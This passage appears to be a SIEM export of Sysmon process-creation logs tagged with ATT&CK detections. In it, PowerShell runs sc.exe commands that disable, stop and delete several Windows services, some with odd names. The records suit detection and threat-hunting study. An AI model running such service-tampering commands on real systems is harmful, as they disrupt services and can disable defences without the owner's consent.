C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config ClipBooks Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.295871900Z"",""eventRecordID"":""3923"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.291\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108efb3000}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config ClipBooks Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:38.291"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108efb3000}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config ClipBooks Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.474",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.230 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001084f93000} +ProcessId: 7392 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.234072800Z"",""eventRecordID"":""3921"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.230\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001084f93000}\r\nProcessId: 7392\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.230"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001084f93000}"",""processId"":""7392"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.390",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.150 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010d8f63000} +ProcessId: 2920 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.156859700Z"",""eventRecordID"":""3918"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.150\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010d8f63000}\r\nProcessId: 2920\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.150"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010d8f63000}"",""processId"":""2920"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.343",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.090 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010faf43000} +ProcessId: 5584 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.106311700Z"",""eventRecordID"":""3916"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.090\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010faf43000}\r\nProcessId: 5584\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.090"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010faf43000}"",""processId"":""5584"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.334",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.064 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001098f33000} +ProcessId: 380 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.066829500Z"",""eventRecordID"":""3915"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.064\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001098f33000}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.064"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001098f33000}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.251",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.983 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010ebf03000} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net 
CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.987394000Z"",""eventRecordID"":""3912"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.983\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010ebf03000}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.983"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010ebf03000}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.193",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.869 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001060ee3000} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.879762200Z"",""eventRecordID"":""3909"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.869\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001060ee3000}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 